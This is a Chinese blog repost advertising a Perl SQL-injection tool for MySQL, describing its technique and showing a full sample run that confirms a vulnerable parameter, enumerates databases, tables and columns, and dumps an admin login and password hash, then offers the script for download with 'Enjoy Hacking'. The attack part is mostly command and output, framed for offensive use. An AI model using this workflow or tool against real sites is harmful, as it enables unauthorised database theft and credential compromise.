<<  最新更新,卡巴斯基 7.0 8.0 9.0 kis kav授权文件下载 | 首 页 |

  • 2010-03-05

    mysql注射工具及其简单测试perl/ - [源码资源]

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://shareanything.blogbus.com/logs/59933201.html

    来源:www.0x50sec.org

    MySQL注射工具及其简单测试(Perl)

    order by的验证采用折半方式猜解,可以自由选择dump的数据库,默认是当前数据库。
    dump数据库的时候用的是group_concat()一次get就搞定,因为有时候table比较多为了能全部显示,所以dump table_name的时候用的是limit x,1,一次get()只能读出一条记录,鱼与熊掌不可兼得啊。基本上人工是怎么注射的,这个小程序就是怎么注射的。
    简单测试结果如下:

     

    alone@alone-desktop:~/perl$ ./sql51.pl ‘http://127.1/vnews.php?print=1&id=2′ ‘good’

    |=—————————————–=|
    |=———[ SQL Injector V1.0 ]———–=|
    |=———–[ By hackerxwar ]————-=|
    |=—————————————–=|

    [*] Test and 1=1
    [*] Test and 1=2

    [+] Vulnerable!!!

    [*] Test Mysql Version = 4.x

    [-] Mysql Version Is Not 4.x

    [*] Test Mysql Version = 5.x

    [+] Mysql Version is 5.x

    [*] Test Order By Query…

    [*] Test order by 25–
    [*] Test order by 13–
    [*] Test order by 7–
    [*] Test order by 4–
    [*] Test order by 5–
    [*] Test order by 6–

    [+] Found Order By 6
    [*] Getting Basic Info…

    [+] Data User: root@localhost
    [+] Database : sqlin

    [*] Check file_priv…

    [+] file_priv :Y

    [*] mysql5 will dump dbs…
    [*] Dumping databases …

    [+] Dump dbs :
    information_schema
    mysql
    sqlin

    Enter the database to dump:
    Default is The current database [sqlin]

    [*] Dumping table_name from database [sqlin]…
    Ext_JCCHP_Company
    Ext_JCCMS_Attachments
    Ext_JCCMS_Category
    Ext_JCCMS_Item
    Ext_JCRack_Product
    Ext_JCStaticPage
    Ext_JCUser
    Ext_JCUser_Purview
    Ext_JCUser_PurviewLink
    Ext_JCVisitorsBook_Words
    W3B_ServiceDonames
    W3B_Services
    admin
    uni_addons
    uni_articles
    uni_comments
    uni_custom_pages
    uni_files
    uni_files_ctg
    uni_gallery
    uni_gallery_ctg
    uni_menu
    uni_menu_ctg
    uni_news
    uni_patterns
    uni_patterns_ctg
    uni_rmenu
    uni_settings
    uni_styles
    uni_users
    Enter the table to dump: uni_users
    [*] Dumping column_name from table [sqlin.uni_users]…

    [+] Dump column_name from table [uni_users]:
    id
    login
    email
    password
    access

    [*] Dump the conten from table [uni_users]…
    Enter the username field: login
    Enter the password field: password

    [+] Dump [login]:[password] from table [uni_users]:
    admin:21232f297a57a5a743894a0e4a801fc3

    [+] Done…

    [+] Enjoy Hacking…

    下载地址:xmysql-v1.pl.tar


    收藏到:Del.icio.us




    Tag:0x50sec.org,mysql,注射工具
    引用地址:
    shareanything 发表于18:55:47 | 编辑 | 分享 0